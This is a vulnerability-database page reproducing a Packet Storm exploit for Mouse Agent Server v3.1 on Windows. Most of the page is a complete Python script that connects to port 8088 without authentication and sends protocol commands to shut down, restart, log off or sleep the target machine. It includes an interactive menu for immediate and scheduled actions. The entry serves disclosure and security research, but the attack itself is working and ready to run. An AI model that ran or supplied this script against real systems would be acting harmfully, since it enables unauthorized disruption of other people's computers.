Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Mouse Agent Server 3.1 Unauthenticated Remote System Control

🗓️ 21 Jul 2025 00:00:00Reported by Chokri HammediType 
packetstorm
 packetstorm🔗 packetstorm.news👁 88 Views

Mouse Agent Server version 3.1 on Windows enables unauthenticated remote power commands via port 8088.

Code
# Exploit Title: Mouse Agent Server v3.1 - Remote Power Control
    (Shutdown/Reboot/Logoff)
    # Date: 19/07/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.docs.kr/
    # Software Link: http://192.168.8.100:8080/ (IOS/Android Mobile App
    Interface)
    # Version: 3.1 (Windows)
    # Tested on: Windows 10 / Windows 11
    
    
    '''
    Description:
    
    Mouse Agent Server v3.1 exposes a TCP control interface on port 8088 that
    allows remote execution of power commands (shutdown, restart, sleep,
    logoff) via unauthenticated commands. An attacker on the same network can
    exploit this to disrupt the system remotely without user interaction.
    
    '''
    
    import socket
    import time
    
    
    class Colors:
        RED = '\033[91m'
        YELLOW = '\033[93m'
        END = '\033[0m'
    
    class MouseAgentController:
        def __init__(self, host, port=8088, password=None):
            self.host = host
            self.port = port
            self.password = password
            self.sock = None
    
        def connect(self):
            try:
                self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.sock.settimeout(5)
                self.sock.connect((self.host, self.port))
    
    
                self._send_raw("LIN:")
                response = self._receive_response()
    
                if "LIN:PASS" in response:
                    if not self.password:
                        self.password = input("Server requires password: ")
                    self._send_raw(f"LIN:{self.password}")
                    response = self._receive_response()
                    if "LIN:OK" not in response:
                        print("✖ Authentication failed")
                        return False
                return True
            except Exception as e:
                print(f"✖ Connection error: {e}")
                return False
    
        def _send_raw(self, command):
            self.sock.sendall((command + "\r\n").encode())
    
            time.sleep(0.3)
    
        def _receive_response(self):
            return self.sock.recv(1024).decode().strip()
    
        def send_power_command(self, action, minutes=0):
            commands = {
                "sleep": "SCD:SLP",
                "logoff": "SCD:LOF",
                "restart": "SCD:RST",
                "shutdown": "SCD:OFF",
                "cancel": "SCD:DEL"
            }
            if action in commands:
                cmd = commands[action]
                if action != "cancel":
                    cmd += f",{minutes}"
                self._send_raw(cmd)
                return True
            return False
    
        def close(self):
            if self.sock:
                self.sock.close()
    
    def get_time_input():
        while True:
            try:
                hours = int(input("Enter hours (0-23): "))
                minutes = int(input("Enter minutes (0-59): "))
                if 0 <= hours <= 23 and 0 <= minutes <= 59:
                    return hours * 60 + minutes
                print("Please enter valid time (hours: 0-23, minutes: 0-59)")
            except ValueError:
                print("Please enter numbers only")
    
    def main():
        import argparse
        parser = argparse.ArgumentParser(description='MouseAgent Power Control')
        parser.add_argument('host', help='Server IP address')
        parser.add_argument('-p', '--port', type=int, default=8088,
    help='Server port (default: 8088)')
        parser.add_argument('--password', help='Server password', default=None)
        args = parser.parse_args()
    
        controller = MouseAgentController(args.host, args.port, args.password)
        if not controller.connect():
            return
    
        try:
            while True:
                print("\n=== MouseAgent Power Control ===")
                print("Immediate Actions:")
                print("[1] Sleep now       [2] Log off now")
                print("[3] Restart now     [4] Shutdown now")
                print("\nScheduled Actions:")
                print("[5] Schedule Sleep  [6] Schedule Log off")
                print("[7] Schedule Restart [8] Schedule Shutdown")
                print("\n[9] Cancel All Scheduled Actions")
                print("[0] Exit")
    
                choice = input("\nSelect option: ").strip()
    
                if choice == '0':
                    break
    
                actions = {
                    '1': ("sleep", 0, f"{Colors.YELLOW}✓ Sleep command sent
    (executes in ~60 seconds){Colors.END}"),
                    '2': ("logoff", 0, f"{Colors.YELLOW}✓ Log off command sent
    (executes in ~60 seconds){Colors.END}"),
                    '3': ("restart", 0, f"{Colors.YELLOW}✓ Restart command sent
    (executes in ~60 seconds){Colors.END}"),
                    '4': ("shutdown", 0, f"{Colors.YELLOW}✓ Shutdown command
    sent (executes in ~60 seconds){Colors.END}"),
                    '5': ("sleep", None, f"{Colors.RED}✓ Sleep scheduled in
    {{}}{Colors.END}"),
                    '6': ("logoff", None, f"{Colors.RED}✓ Log off scheduled in
    {{}}{Colors.END}"),
                    '7': ("restart", None, f"{Colors.RED}✓ Restart scheduled in
    {{}}{Colors.END}"),
                    '8': ("shutdown", None, f"{Colors.RED}✓ Shutdown scheduled
    in {{}}{Colors.END}"),
                    '9': ("cancel", 0, f"{Colors.RED}✓ All scheduled actions
    cancelled{Colors.END}")
                }
    
                if choice in actions:
                    action, minutes, msg = actions[choice]
                    if minutes is None:
                        delay = get_time_input()
                        controller.send_power_command(action, delay)
                        print(msg.format(f'{delay//60}h {delay%60}m'))
                    else:
                        controller.send_power_command(action, minutes)
                        print(msg)
                else:
                    print("✖ Invalid choice")
    
        finally:
            controller.close()
            print("✓ Disconnected")
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jul 2025 00:00Current
7.8High risk
Vulners AI Score7.8
unauthenticated accessremote power controlmouse agent serverwindowssecurity vulnerability
88